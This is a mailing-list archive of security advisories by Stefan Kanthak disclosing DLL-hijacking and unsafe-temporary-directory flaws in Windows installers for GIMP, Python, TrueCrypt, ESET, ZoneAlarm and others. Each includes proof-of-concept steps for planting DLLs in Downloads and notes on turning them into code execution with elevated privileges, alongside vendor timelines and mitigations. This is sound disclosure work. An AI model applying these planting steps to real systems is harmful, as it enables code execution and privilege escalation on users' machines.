Re: Executable installers are vulnerable^WEVIL (case 26): the installer of GIMP for Windows allows arbitrary (remote) and escalation of privilege

2016-02-24 Thread Stefan Kanthak
"Jernej Simončič" <jernej|> wrote:

> On 23. februar 2016, 17:37:54, Stefan Kanthak wrote:
>> Proof of concept/demonstration:
>> ~~~
> Can't reproduce - tested on Windows XP SP3, Windows 7 x64 SP1 and
> Windows 10 x64 (10586.104), and I tested not only with
> gimp-2.8.16-setup-1.exe, but also with gimp-2.8.14-setup-1.exe and
> gimp-2.8.10-setup.exe - none of them triggered anything from
> sentinel.dll/uxtheme.dll.

UXTheme.dll is loaded when "visual styles" and/or "themes" are
DISABLED (which is the case in my test systems), either via GUI, via


or via stopping/disabling the "themes" service:

NET.EXE Stop Themes
SC.EXE Config Themes Start= Disabled

With "visual styles" and/or "themes" ENABLED DWMAPI.dll is loaded
instead of UXTheme.dll.

Additionally WindowsCodecs.dll is loaded if the caller is a
protected administrator, independent of the "visual styles" or
"themes" settings.

So "step 1" of the PoC needs to be modified as follows (the addition
is underlined) to cover these situations/preconditions:

1. visit <>, download
   <> and save
   it as UXTheme.dll in your "Downloads" directory, then copy it
   as DWMAPI.dll and WindowsCodecs.dll there; ~~

> This is what I expected - the way Inno Setup works, the downloaded
> executable installer has a stub which extracts the real installer to a
> subdirectory of %TEMP%, and runs it from there; the stub's UI is
> limited to a simple MessageBox call in case the extraction fails - it
> does not link to uxtheme.dll at all.

This is plain wrong: InnoSetup extracts a stub (with the filename of
the executable, but the extension changed to .tmp) to an UNSAFE
subdirectory of %TEMP% and executes it from there.
gimp-2.8.16-setup-1.tmp is just 1.189.488 bytes small.

After the successful start of the extracted stub the downloaded .EXE
displays a dialog asking for the UI language.
DWMAPI.dll or UXTheme.dll is loaded by the downloaded .EXE before
this dialog is displayed.

Only if the extraction of this stub or its start fails then none of
these DLLs is loaded.

stay tuned
Stefan Kanthak

PS: you can blame InnoSetup (or Windows) for this behavior of your
executable installer. This but doesn't fix this vulnerability,
and it keeps all your users at risk.

You need to have both the DLL hijacking AND the unsafe temporary
subdirectory fixed.
Your best way for this is: dump InnoSetup, create a .MSI instead!

[CVE-2016-0602, CVE-2016-0603] Executable installers are vulnerable^WEVIL (case 24): Oracle Java 6/7/8 SE and VirtualBox

2016-02-07 Thread Stefan Kanthak
Hi @ll,

the installers or Oracle's Java 6/7/8 for Windows and VirtualBox for
Windows load and execute several DLLs from their "application directory".

* The online installer jxpiinstall.exe:
  UXTheme.dll and RASAdHlp.dll plus
  (on Windows XP) SetupAPI.dll, HNetCfg.dll and XPSP2Res.dll
  (on Windows Vista and above) ProfAPI.dll, Secur32.dll, NTMarta.dll
  and Version.dll

* The offline installer jre-8u66-windows-i586.exe:
  UXTheme.dll, RASAdHlp.dll, NTMarta.dll, Secur32.dll, WinHTTP.dll,
  NetUtils.dll, ProfAPI.dll and WindowsCodecs.dll

* VirtualBox-5.0.12-104815-Win.exe:
  UXTheme.dll, MSIHnd.dll and MSI.dll plus
  (on Windows XP) SFC_OS.dll, ClbCatQ.dll, XPSP2Res.dll, WS2_32.dll
  and WS2Help.dll
  (on Windows 7) PropSys.dll, ProfAPI.dll and DWMAPI.dll

For software downloaded with a web browser the application
directory is typically the user's "Downloads" directory: see
and <> for
"prior art" about this well-known and well-documented vulnerability.

Oracle published an advisory and new installers for Java SE today:

Oracle published updated versions of VirtualBox on 2019-01-19:

stay tuned
Stefan Kanthak

Executable installers are vulnerable^WEVIL (case 23): WinImage's installer and self-extractors allow arbitrary (remote) code execution and escalation of privilege

2016-01-31 Thread Stefan Kanthak
Hi @ll,

the executable installer winima90.exe and previous versions
available from <> loads and executes
CRTdll.dll, UXTheme.dll, RichEd32.dll and WindowsCodecs.dll
from its "application directory".

Self-extracting executables created with WinImage load and
execute CRTdll.dll, UXTheme.dll and MPR.dll from their
"application directory".

For software downloaded with a web browser the application
directory is typically the user's "Downloads" directory: see
and <> for
"prior art" about this well-known and well-documented vulnerability.

If an attacker places the DLLs named above in the users
"Downloads" directory (for example per drive-by download or
social engineering) this vulnerability becomes a remote code

Due to the application manifest embedded in the executable
installer which specifies "requireAdministrator" it is run
with administrative privileges ("protected" administrators
are prompted for consent, unprivileged standard users are
prompted for an administrator password); execution of the
DLLs therefore results in an escalation of privilege!

See <>
and <>
plus <>

Proof of concept (verified on Windows XP, Windows Vista, Windows 7,
Windows Server 2008 [R2]; should work on newer versions too):

1. visit <>, download
   <> and save
   it as UXTheme.dll in your "Downloads" directory, then copy it
   as RichEd32.dll, WindowsCodecs.dll and MPR.dll;

2. download winima90.exe and save it in your "Downloads"

3. run winima90.exe (or a self-extractor created with WinImage)
   from the "Downloads" directory;

4. notice the message boxes displayed from the DLLs placed in
   step 1.


5. copy the downloaded UXTheme.dll as CRTdll.dll;

6. rerun winima90.exe or a self-extractor from the "Downloads"


This denial of service can easily be turned into an arbitrary code
execution: just create a CRTdll.dll which exports all the symbols
referenced by winima90.exe or the self-extractors and place it in
the "Downloads" directory.

For this well-known (trivial, easy to avoid, easy to detect and
easy to fix) beginner's error see
<> and
<> plus

| To ensure secure loading of libraries
| * Use proper DLL search order.
| * Always specify the fully qualified path when the library location is
|   constant.

Stefan Kanthak


2016-01-12report sent to vendor

  NO ANSWER, not even an acknowledgement of receipt

2016-01-21report resent to vendor

  NO ANSWER, not even an acknowledgement of receipt

2016-01-30report published

Executable installers are vulnerable^WEVIL (case 3): WiX Toolset's bootstrapper "burn.exe"

2016-01-21 Thread Stefan Kanthak
"%ALLUSERSPROFILE%" alias %ProgramData%" and "%PUBLIC%": Windows
   doesn't place executables in these directories and beyond.

   See <> as well as
   <> plus
   or <> and finally

stay tuned
Stefan Kanthak

PS: This vulnerability results from the use of the Win32 API for
the NTFS encrypting file system [³] (EFS) in "burn.exe".

Due to a beginner's error made about 16 years ago during the
development of EFS and still present in current versions of
Windows this loads FEClient.dll with a simple (unqualified)
filename ['] (see MS16-007 and CVE-2016-0014).

PPS: see <> and
 <> plus
 <> and the not
 yet finished <!execute.html>
 for more details!

PPPS: the case numbers are not in chronological order.

[°] Self-extracting archives and executable installers are flawed^W
b(rainde)ad in concept and dangerous in practice.

ALWAYS use the resp. target platforms native package and archive

For Windows these are .INF (plus .CAB) and .MSI (plus .CAB),
introduced 20 years ago (with Windows 95 and Windows NT4) resp.
16 years ago (with Office 2000).

Both .INF and .MSI are "opened" by programs residing in
%SystemRoot%\System32\ which are therefore immune to this kind
of "DLL and EXE Search Order Hijacking" attack.
Since both .INF and .MSI access the contents of .CAB directly
they eliminate the attack vector "unsafe temporary directory"

['] A well-known (trivial, easy to avoid, easy to detect, easy
to exploit and easy to fix) and well-documented vulnerability:
see <>,
<> and

[²] Another well-known (trivial, easy to avoid, easy to detect, easy
to exploit and easy to fix) and well-documented vulnerability:
see <>,
<> ...

[³] see <>

Executable installers are vulnerable^WEVIL (case 21): Panda Security's installers allow arbitrary (remote) code execution AND escalation of privilege with PANDAIS16.exe

2016-01-19 Thread Stefan Kanthak
Hi @ll,

the executable installers PANDAIS16.exe, PANDAAP16.exe,
PANDAGL16.exe and PANDAGP16.exe available from
 load and execute (at least) UXTheme.dll,
RichEd20.dll and RichEd32.dll from their "application directory".

For software downloaded with a web browser the application
directory is typically the user's "Downloads" directory: see
and <>

If an attacker places the above named DLLs in the users "Downloads"
directory (for example per drive-by download or social engineering)
this vulnerability becomes a remote code execution.

Due to the application manifest embedded in the executables which
specifies "requireAdministrator" the executable installer is run
with administrative privileges ("protected" administrators are
prompted for consent, unprivileged standard users are prompted for
an administrator password); execution of the DLLs therefore results
in an escalation of privilege!

Proof of concept/demonstration:

1. visit <>, download
   <>, save it
   as UXTheme.dll in your "Downloads" directory, then copy it as
   RichEd20.dll and RichEd32.dll;

2. download PANDA{IS,AP,GL,GP}16.exe and save it in your "Downloads"

3. run PANDA{IS,AP,GL,GP}16.exe per double-click from your "Downloads"

4. notice the message boxes displayed from the DLLs placed in step 1.


See <> and
<> as well as
<!execute.html> and
<> for details about
this well-known and well-documented BEGINNER'S error!

Stefan Kanthak

PS: I really LOVE (security) software with such trivial beginner's
errors. It's a tell-tale sign to stay away from this crapware!


2015-12-29sent report to vendor

  NP ANSWER, not even an acknowledgement of receipt

2016-01-10resent report to vendor

  NO ANSWER, not even an acknowledgement of receipt

2016-01-19report published

Executable installers are vulnerable^WEVIL (case 22):'s executable installers allow arbitrary (remote) code execution

2016-01-15 Thread Stefan Kanthak
Hi @ll,

the executable installers python-3.5.1-webinstall.exe and
python-3.5.1.exe available on
<> load and execute
multiple DLLs from their "application directory".

For software downloaded with a web browser the application
directory is typically the user's "Downloads" directory: see
and <> for "prior art"
about this well-known and well-documented vulnerability.

If an attacker places one of these DLLs in the users "Downloads"
directory (for example per drive-by download or social engineering)
this vulnerability becomes a remote code execution.

Proof of concept/demonstration:

(verified on Windows XP, Windows Vista, Windows 7, Windows Server
2008 [R2]; should work on newer versions too)

1. visit <>, download
   <> and store
   it as FEClient.dll in your "Downloads" directory, then copy it
   as ClbCatQ.dll (Windows NT 5.x) or ProfAPI.dll (Windows NT 6.x);

2. download python-3.5.1-webinstall.exe and python-3.5.1.exe and
   store them in your "Downloads" directory;

3. run python-3.5.1-webinstall.exe and python-3.5.1.exe from your
   "Downloads" directory;

4. notice the message boxes displayed from the DLLs placed in step 1.


5. copy FEClient.dll as MSI.dll and Version.dll;

6. rerun python-3.5.1-webinstall.exe and python-3.5.1.exe from your
   "Downloads" directory.


The denial of service from step 6. can easily be turned into an
arbitrary code execution: just create an MSI.dll or Version.dll
with the exports referenced from the executable installers.

For this well-known (trivial, easy to avoid, easy to detect and
easy to fix) beginner's error see
<> and
<> plus

Additionally python-3.5.1-webinstall.exe and python-3.5.1.exe
create the UNSAFE temporary directories
respectively where they unpack some files and a DLL for execution.
An unprivileged user can overwrite/modify these files and the DLL
between their extraction and use/execution.

PWNED once more!

For this well-known (trivial, easy to avoid, easy to detect and
easy to fix) beginner's error see
<> ...

See <>,
<> and
<> plus
<> and the still unfinished
<!execute.html> for more details and why
executable installers (and self-extractors too) are bad and should be

stay tuned
Stefan Kanthak


2015-11-13report sent to

2015-11-13auto-response from
  "will investigate and reply ASAP"

2015-12-23requested status from vendor
  "How do you define ASAP?"

  NO ANSWER, not even an acknowledgement of receipt

2016-01-15report published

Defense in depth -- the Microsoft way (part 38): does Microsoft follow their own security guidance/advisories?

2016-01-15 Thread Stefan Kanthak
Hi @ll,

in 2009/2010, after beeing hit by "carpet bombing" and "binary
planting" alias "DLL hijacking/spoofing/preloading" (see
and <>)
Microsoft finally started to provide security guidance/advisories
for "safe library loading" to Windows developers:


| Applications can control the location from which a DLL is loaded by
| specifying a full path or using another mechanism such as a manifest.


| Wherever possible, specify a fully qualified path when using the
| LoadLibrary, LoadLibraryEx [...] functions.


| When an application loads a DLL without specifying a fully
| qualified path name, Windows will attempt to locate the DLL by
| searching a defined set of directories.
| Development best practices state that applications should call
| SetDllDirectory with a blank path before calling
| LoadLibrary("foo.dll") to ensure that foo.dll is not loaded from
| the current directory. We are investigating whether any of our
| own applications are affected by this class of vulnerability so
| that we can take appropriate action to protect customers.


| Use fully qualified paths for all calls to LoadLibrary, [...]
| where you can.


| This exploit may occur when applications do not directly specify
| the fully qualified path to a library it intends to load.


| Always specify the fully qualified path when the library location
| is constant.

Now the (obviously rhetorical) question: does Microsoft follow their
own guidance?

The (also obvious) answer: THEY DON'T, at least for existing code,
despite "trustworty computing" or the "secure development lifecycle"
Microsoft brags about since years.

Some examples for unsafe library loading recently published:

FEClient.dll (see CVE-2016-0014 and MS16-007):
  introduced in Windows 2000, loaded without fully qualified path
  by AdvAPI32.dll since then.

  FEClient.dll is loaded from the "application directory" of every
  program which uses EFS functions (see
  and <>):
  all executable installers and self-extractors used by Microsoft
  allow^Wsupport "DLL hijacking" via FEClient.dll!

OCIW32.dll, OCI.dll (see MS15-132):
  loaded without fully qualified path by MSDAORA.DLL since Windows NT4.

ELSEXT.dll (see MS15-132):
  loaded without fully qualified path by ELS.DLL since Windows Vista.

MQRT.dll (see MS15-132):
  loaded without fully qualified path by COMSVCS.DLL since Windows NT4.

EDBBCli.dll, ESEBCli2.dll (see MSKB275876):
  loaded without fully qualified path by NTBackup.exe since Windows NT4.


  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File 
Execution Options\NTBackup.exe]


UXTheme.dll (see CVE-2012-4206, ...):
  introduced in Windows XP, loaded without fully qualified path by
  AppWiz.cpl, BrowseUI.dll, ComDlg32.dll, Dot3UI.dll, DUser.dll,
  Explorer.exe, HelpCtr.exe, Kernel32.dll, LogonUI.exe, MMC.exe,
  MSHTML.dll, Shell32.dll, ShlWAPI.dll, ThemeUI.dll, WSCUI.dll,
  WZCDlg.dll and MANY more since then.

  Almost all executables using the Windows GUI allow^Wsupport
  "DLL hijacking" via UXTheme.dll.


  use SAFER alias Software Restriction Policies and deny execution
  everywhere except %SystemRoot% and below and %ProgramFiles% and

  See <> and/or
  <> for instructions.

stay tuned
Stefan Kanthak

[CVE-2016-0014] Executable installers are vulnerable^WEVIL (case 1): Microsoft's IExpress resp. WExtract, SFXCab, BoxStub, ...

2016-01-14 Thread Stefan Kanthak
oval tool,

* ROOTSUPD-KB931125-*.exe, the root certificate updater, see

* RVKROOTS.EXE, the root certificate revocation list updater,
  available from the SECURITY (sic!) advisories
  or the Microsoft Update Catalog

* ALL installers of the .NET Framework:

* Windows Defender Offline, see

* ALL Visual C++ Runtime 20xy Redistributable Packages

* ALL hotfixes and updates for Windows 2000, Windows XP, Windows
  Embedded POSReady 2009, Windows Server 2003 (Windows*-KB*-*.exe)

and THOUSANDS more!


About 16 years ago Microsoft introduced the NTFS "encrypting file


| When a user modifies EFS options for a file or folder, or when an
| application attempts to access an encrypted file on an NTFS volume,
| the Win32 application programming interface (API) passes the
| resulting EFS-related calls to the Feclient DLL. Feclient then
| calls the EFS remote procedure call (RPC) interfaces in the LSA.

FEClient.dll is loaded on demand by AdvAPI32.dll (one of the Win32
core components) without its well-known fully qualified pathname,
resulting in the vulnerability now fixed with MS16-007 alias KB3121918.



   If your favourite applications are not distributed in the native
   installer package format of the resp. target platform: ask^WURGE
   their vendors/developers to provide native installation packages.
   If they don't: dump these applications, stay away from such cruft!

1. Turn off UAC's privilege elevation for standard users and installer
   detection for all users:

   "ConsentPromptBehaviorUser"=dword: ; Automatically deny elevation 


2. NEVER execute files in UNSAFE directories (like "Downloads" and
   and "%TEMP%")!

3. Deny execution (at least) in the "Downloads" directories and all
   "%TEMP%" directories and their subdirectories:

   * Add the NTFS ACE "(D;OIIO;WP;;;WD)" meaning "deny execution of
 files in this directory for everyone, inheritable to all files
 in all subdirectories" (use CACLS.EXE /S: for example);

   * Use "software restriction policies" resp. AppLocker.

   Consider to apply either/both to every "%USERPROFILE%" as well as
   "%ALLUSERSPROFILE%" alias %ProgramData%" and "%PUBLIC%": Windows
   doesn't place executables in these directories and beyond.

   See <> as well as
   <> plus
   or <> and finally

stay tuned
Stefan Kanthak

PS: for "case 0" see <>,
for "case 0.5" see <>;
the case numbers are not in chronological order.

PPS: see <> (resp. the
 not yet finished <!execute.html>)
 for more details!

[°] Self-extracting archives and executable installers are flawed^W
b(rainde)ad in concept and dangerous in practice.

ALWAYS use the resp. target platforms native package and archive

For Windows these are .INF (plus .CAB) and .MSI (plus .CAB),
introduced 20 years ago (with Windows 95 and Windows NT4) resp

Executable installers are vulnerable^WEVIL (case 20): TrueCrypt's installers allow arbitrary (remote) code execution and escalation of privilege

2016-01-08 Thread Stefan Kanthak
Hi @ll,

the executable installers "TrueCrypt Setup 7.1a.exe" and
TrueCrypt-7.2.exe load and execute USP10.dll, RichEd20.dll,
NTMarta.dll and SRClient.dll from their "application directory".

For software downloaded with a web browser the application
directory is typically the user's "Downloads" directory: see
and <> for "prior art"
about this well-known and well-documented vulnerability.

If an attacker places the above named DLLs in the users "Downloads"
directory (for example per drive-by download or social engineering)
this vulnerability becomes a remote code execution.
Due to the application manifest embedded in the executables which
specifies "requireAdministrator" the executable installers are run
with administrative privileges ("protected" administrators are
prompted for consent, unprivileged standard users are prompted for
an administrator password); execution of the DLLs therefore results
in an escalation of privilege!

Proof of concept/demonstration:

(verified on Windows XP, Windows Vista, Windows 7, Windows Server
2008 [R2]; should work on newer versions too)

1. visit <>, download
   <> and store
   it as USP10.dll in your "Downloads" directory, then copy it as
   NTMarta.dll, RichEd20.dll and SRClient.dll;

2. download TrueCrypt-7.2.exe and "TrueCrypt Setup 7.1a.exe" and
   store them in your "Downloads" directory;

3. run TrueCrypt-7.2.exe and "TrueCrypt Setup 7.1a.exe" from your
   "Downloads" directory;

4. notice the message boxes displayed from the DLLs placed in step 1.


5. on Windows XP copy the downloaded USP10.dll as SetupAPI.dll (or
   create an empty file SetupAPI.dll), then rerun TrueCrypt*.exe
   from your "Downloads" directory.


The denial of service from step 5. can easily be turned into an
arbitrary code execution with elevation of privilege too: add the
exports SetupDiOpenClassRegKey, SetupInstallFromInfSectionA,
SetupOpenInfFileA and SetupCloseInfFile to the SetupAPI.dll copied
to the "Downloads" directory.

For this well-known (trivial, easy to avoid, easy to detect and
easy to fix) beginner's error see
<> and
<> plus

See <>,
<> and
<> plus
<> and the still unfinished
<!execute.html> for more details and why
executable installers (and self-extractors too) are bad and should be

stay tuned
Stefan Kanthak

PS: I really LOVE (security) software with such trivial beginner's
errors. It's a tell-tale sign to stay away from this crapware!


2015-12-23report sent to vendor

  NO ANSWER, not even an acknowledgement of receipt

2016-01-01reports resent to vendor

  NO ANSWER, not even an acknowledgement of receipt

2016-01-08report published

Executable installers are vulnerable^WEVIL (case 19): ZoneAlarm's installers allow arbitrary (remote) code execution and escalation of privilege

2016-01-07 Thread Stefan Kanthak
Hi @ll,

the executable installers ZASPSetupWeb_141_011_000.exe and
zafwSetupWeb_141_011_000.exe load and execute (at least)
UXTheme.dll, WindowsCodecs.dll and ProfAPI.dll from their
"application directory".

For software downloaded with a web browser the application
directory is typically the user's "Downloads" directory: see
and <> for "prior art"
about this well-known and well-documented vulnerability.

If an attacker places the above named DLLs in the users "Downloads"
directory (for example per drive-by download or social engineering)
this vulnerability becomes a remote code execution.
Due to the application manifest embedded in the executables which
specifies "requireAdministrator" the executable installers are run
with administrative privileges ("protected" administrators are
prompted for consent, unprivileged standard users are prompted for
an administrator password); execution of the DLLs therefore results
in an escalation of privilege!

Proof of concept (verified on Windows XP, Windows Vista, Windows 7,
Windows Server 2008 [R2]; should work on newer versions too):

1. visit <>, download
   <> and save
   it as UXTheme.dll in your "Downloads" directory, then copy it
   as ProfAPI.dll and WindowsCodecs.dll;

2. download ZASPSetupWeb_141_011_000.exe and/or
   zafwSetupWeb_141_011_000.exe and save them in your "Downloads"

3. run ZASPSetupWeb_141_011_000.exe and/or
   zafwSetupWeb_141_011_000.exe from the "Downloads" directory.


>From the vendor's web site

| To start installation:
| * Click Save File on the browser pop up.
| * By default your downloaded file will be in the Downloads
|   folder under Documents. Double-click the  zafwSetupWeb.exe
|   file to begin installation.


For this well-known (trivial, easy to avoid, easy to detect and
easy to fix) beginner's error see
<> and
<> plus

Additionally: ZASPSetupWeb_141_011_000.exe and
zafwSetupWeb_141_011_000.exe create the UNSAFE temporary directory
%TEMP%\{907A1104-E812-4b5c-959B-E4DAB37A96AB} to unpack their
payload and download other executables, including your real
executable installer install.exe, which has but the same bugs!

Proof of concept (verified on Windows XP, Windows Vista, Windows 7,
Windows Server 2008 [R2]; should work on newer versions too):

4. create the directory %TEMP%\{907A1104-E812-4b5c-959B-E4DAB37A96AB};

5. copy UXTheme.dll and WindowsCodecs.dll downloaded in step 1
   above into this empty directory;
   for a denial of service copy it as PowrProf.dll, WebIO.dll,
   WinHttp.dll, Version.dll and MSWSock.dll (or create your own
   DLL which exports the referenced entries to have them loaded
   and executed too);

6. run ZASPSetupWeb_141_011_000.exe and/or 
   zafwSetupWeb_141_011_000.exe from step 3 above.


For this well-known (trivial, easy to avoid, easy to detect and
easy to fix) beginner's error see
<> ...

See <>,
<> and
<> plus
<> and the still unfinished
<!execute.html> for more details and why
executable installers (and self-extractors too) are bad and should be

stay tuned
Stefan Kanthak

PS: I really LOVE (security) software with such trivial beginner's
errors. It's a tell-tale sign to stay away from this crapware!


2015-12-13report sent to vendor

  NO ANSWER, not even an acknowledgement of receipt

2015-12-23reports resent to vendor

  NO ANSWER, not even an acknowledgement of receipt

2016-01-01reports resent to vendor

  NO ANSWER, not even an acknowledgement of receipt

2016-01-07report published

Executable installers are vulnerable^WEVIL (case 18): EMSISoft's installers allow arbitrary (remote) code execution and escalation of privilege

2016-01-07 Thread Stefan Kanthak
Hi @ll,

EmsisoftAntiMalwareSetup.exe as well as
EmsisoftAntiMalwareXPSetup.exe, EmsisoftEmergencyKit.exe and
EmsisoftHiJackFreeSetup.exe load and execute UXTheme.dll (plus
other DLLs like RichEd20.dll and RichEd32.dll) eventually found
in the directory they are started from (the "application directory").

For software downloaded with a web browser the application
directory is typically the user's "Downloads" directory: see
and <> for "prior art"
about this well-known and well-documented vulnerability.

If one of the DLLs named above gets planted in the user's "Downloads"
directory per "drive-by download" or "social engineering" this
vulnerability becomes a remote code execution.

Due to the application manifest embedded in the executables which
specifies "requireAdministrator" or the installer detection of
Windows' user account control (under Windows XP the installers
request to be started with administrative privileges by themselves)
the installers are run with administrative privileges ("protected"
administrators are prompted for consent, unprivileged standard users
are prompted for an administrator password); execution of any
hijacked DLL results in an escalation of privilege!

See <>,
<> and
<> plus
<> and the still unfinished
<!execute.html> for more details and why
executable installers (and self-extractors too) are bad and should be

Proof of concept/demonstration:

1. visit <>, download
   <>, save it
   as UXTheme.dll in your "Downloads" directory, then copy it as
   RichEd20.dll and RichEd32.dll;

2. download EmsisoftAntiMalwareSetup.exe respectively
   EmsisoftAntiMalwareXPSetup.exe, EmsisoftEmergencyKit.exe and
   EmsisoftHiJackFreeSetup.exe and save them in your "Downloads"

3. execute EmsisoftAntiMalwareSetup.exe respectively
   EmsisoftAntiMalwareXPSetup.exe, EmsisoftEmergencyKit.exe and
   EmsisoftHiJackFreeSetup.exe from your "Downloads" directory;

4. notice the message boxes displayed from the DLLs placed in
   step 1.


Additionally the installers create unsafe temporary directories
%TEMP%\is-*.tmp to unpack their payload and execute it from there.

An unprivileged user can overwrite/modify these files between their
extraction and execution, or copy UXTheme.dll plus MSImg32.dll, on
Windows Vista and newer versions of Windows additionally Version.dll
into %TEMP%\is-*.tmp. These DLLs are loaded from the unpacked
%TEMP%\is-*.tmp\Emsisoft*.tmp too.

PWNED again.

stay tuned
Stefan Kanthak

PS: I really LOVE (security) software with such trivial beginner's
errors. It's a tell-tale sign to stay away from such crapware!


2015-12-19three reports sent to vendor

2015-12-21vendor replies to one report:
  "we ignore your report since we don't offer
   EmsisoftHiJackFreeSetup.exe any more."


  NO ANSWER, not even an acknowledgement of receipt
  for the other two reports

2015-12-29reports resent to vendor

  NO ANSWER, not even an acknowledgement of receipt

2016-01-07report published

Executable installers/self-extractors are vulnerable^WEVIL (case 17): Kaspersky Labs utilities

2016-01-04 Thread Stefan Kanthak
Hi @ll,

quite some utilities offered for free by Kaspersky Lab load and execute
rogue/bogus DLLs (UXTheme.dll, HNetCfg.dll, RichEd20.dll, RASAdHlp.dll,
SetupAPI.dll, ClbCatQ.dll, XPSP2Res.dll, CryptNet.dll, OLEAcc.dll etc.)
eventually found in the directory they are started from (the "application

For software downloaded with a web browser the application directory is
typically the user's "Downloads" directory: see
and <> for "prior art"
about this well-known and well-documented vulnerability.

If one of the DLLs named above gets planted in the user's "Downloads"
directory per "drive-by download" or "social engineering" this
vulnerability becomes a remote code execution.

Due to the application manifest embedded in some of the executables
which specifies "requireAdministrator" or the installer detection of
Windows' user account control theses installers/self-extractors are
started with administrative privileges ("protected" administrators are
prompted for consent, unprivileged standard users are prompted for an
administrator password); execution of any hijacked DLL results in
an escalation of privilege!

See <> and
<> plus
<> and the still unfinished
<!execute.html> for more details and why
executable installers (and self-extractors too) are bad and should be

Kaspersky Lab published a security advisory 2015-12-23
after they made updated versions of their utilities available on

stay tuned
Stefan Kanthak

Executable installers are vulnerable^WEVIL (case 15): F-SecureOnlineScanner.exe allows arbitrary (remote) code execution and escalation of privilege

2015-12-23 Thread Stefan Kanthak
Hi @ll,

F-Secure's online virus scanner F-SecureOnlineScanner.exe, available
via <>,
loads and executes several rogue/bogus DLLs (UXTheme.dll, HNetCfg.dll,
RASAdHlp.dll, SetupAPI.dll, ClbCatQ.dll, XPSP2Res.dll, CryptNet.dll,
OLEAcc.dll etc.) eventually found in the directory it is started from
(the "application directory").

For software downloaded with a web browser the application directory
is typically the user's "Downloads" directory: see
and <>

Due to the application manifest embedded in the executable which
specifies "requireAdministrator" the installer is started with
administrative privileges ("protected" administrators are prompted
for consent, unprivileged standard users are prompted for an
administrator password); execution of any hijacked DLL results in
an escalation of privilege!

See <> and
<> plus
<> and the still unfinished
<!execute.html> for more details and why
executable installers (and self-extractors too) are bad.

F-Secure published a security advisory
and made an updated version of their online scanner available on

CAVEAT: F-Secure's fix works only on Windows Vista and newer versions;
    the vulnerability is still present on earlier versions of

stay tuned
Stefan Kanthak

Executable installers are vulnerable^WEVIL (case 14): Rapid7's ScanNowUPnP.exe allows arbitrary (remote) code execution

2015-12-22 Thread Stefan Kanthak
Hi @ll,

the executable installer [°]['] (rather: the 7-Zip based executable
self-extractor [²]) of Rapid7's (better known for their flagship
Metasploit) ScanNowUPnP.exe loads and executes several rogue/bogus
DLLs eventually found in the directory it is started from (the
"application directory"), commonly known as "DLL hijacking".

For software downloaded with a web browser the application directory
is typically the "Downloads" directory: see
and <>

See the comprehensive write-up on Rapid7's community blog:

Especially note that Rapid7 removed the now deprecated ScanNowUPnP.exe
and advises all users to remove it from any system that still has it.

stay tuned
Stefan Kanthak

[°] <>

['] <>

[²] <>

Executable installers are vulnerable^WEVIL (case 13): ESET NOD32 antivirus installer allows remote code execution with escalation of privilege

2015-12-21 Thread Stefan Kanthak
Hi @ll,

the executable installer [°] of ESET's NOD32 antivirus,
eset_nod32_antivirus_live_installer_.exe, loads and executes
(at least) the rogue/bogus/malicious Cabinet.dll and DbgHelp.dll
eventually found in the directory it is started from ['] (the
"application directory").

For software downloaded with a web browser this is typically the
"Downloads" directory: see
and <>

If Cabinet.dll or DbgHelp.dll get planted in the users "Downloads"
directory per "drive-by download" (or "social engineering") this
vulnerability becomes a remote code execution.

Due to the application manifest embedded in the executable which
specifies "requireAdministrator" the installer is started with
administrative privileges ("protected" administrators are prompted
for consent, unprivileged standard users are prompted for an
administrator password); execution of Cabinet.dll or DbgHelp.dll
then results in an escalation of privilege!

Proof of concept/demonstration:

(verified on Windows XP, Windows Vista, Windows 7, Windows Server
2008 [R2]; should work on newer versions too)

1. visit <>, download
   <> and store
   it as Cabinet.dll in your "Downloads" directory, then copy it as

2. download eset_nod32_antivirus_live_installer_.exe and store it in
   your "Downloads" directory;

3. run eset_nod32_antivirus_live_installer_.exe from your "Downloads"

4. notice the message boxes displayed from the DLLs placed in step 1.


Unsuspecting users who follow the guidance on ESET's web site

| (1) Download the .exe file to your computer and double-click
| it to start installation.

are the typical victims!

JFTR: I REALLY love (especially snakeoil) companies which don't
  protect or at least warn their customers from even the most
  trivial handling errors!

See <> plus
<> and the still unfinished
<!execute.html> for more details and why
executable installers (and self-extractors too) are bad.



   If your favourite applications are not distributed in the native
   installer package format of the resp. target platform: ask^WURGE
   their vendors/developers to provide native installation packages.
   If they don't: dump these applications, stay away from such cruft!

1. Turn off UAC's privilege elevation for standard users and installer
   detection for all users:

   "ConsentPromptBehaviorUser"=dword: ; Automatically deny elevation 


2. NEVER execute files in UNSAFE directories (like "Downloads" and
   and "%TEMP%")!

3. Deny execution (at least) in the "Downloads" directories and all
   "%TEMP%" directories and their subdirectories:

   * Add the NTFS ACE "(D;OIIO;WP;;;WD)" meaning "deny execution of
 files in this directory for everyone, inheritable to all files
 in all subdirectories" (use CACLS.EXE /S: for example);

   * Use "software restriction policies" resp. AppLocker.

   Consider to apply either/both to every "%USERPROFILE%" as well as
   "%ALLUSERSPROFILE%" alias %ProgramData%" and "%PUBLIC%": Windows
   doesn't place executables in these directories and beyond.

   See <> as well as
   <> plus
   or <> and finally

stay tuned
Stefan Kanthak

[°] Self-extracting archives and executable installers are flawed^W
b(rainde)ad in concept and dangerous in practice.

ALWAYS use the resp. target platforms native package and archive

For Windows these are .INF (plus .CAB) and .MSI (plus .CAB),
introduced 20 years ago (with Windows 95 and Windows NT4) resp.
16 years ago (with Off

Almost no resp. only some mitigation(s) for "DLL hijacking" via load-time dependencies

2015-12-21 Thread Stefan Kanthak
Hi @ll,

in <> I showed
general mitigations for DLL hijacking via runtime dependencies

DLL hijacking is but also possible via load-time dependencies


Quite some executable installers use the function timeGetTime()
implemented in WinMM.dll (and NO other function from WinMM.dll).


This function yields the same result as GetTickCount()
implemented in Kernel32.dll.

The notable difference: WinMM.dll is NOT in the list of "known DLLs"
(<>), so EVERY program
which uses timeGetTime() from WinMM.dll instead of GetTickCount()
will load a rogue WinMM.dll which exports timeGetTime from its
application directory.

This means: such programs are vulnerable to DLL hijacking unless
run from SAFE locations like %ProgramFiles% or %SystemRoot% where
unprivileged users can't place a rogue WinMM.dll etc. in the
programs application directory.

More general: if an executable installer links to functions not
provided by "known DLLs" for all supported versions of Windows it is
vulnerable to DLL hijacking via load-time dependencies, and there is
NO mitigation except to run it from a safe location!

Now that's a typical "catch 22": an installers task is to write the
files of an application safely, i.e. without the possibility of
tampering, to safe locations, i.e. %ProgramFiles% and %SystemRoot%,
while the installer itself is located somewhere else, typically in
a user's "Downloads" or %TEMP% directory, which are but unsafe and
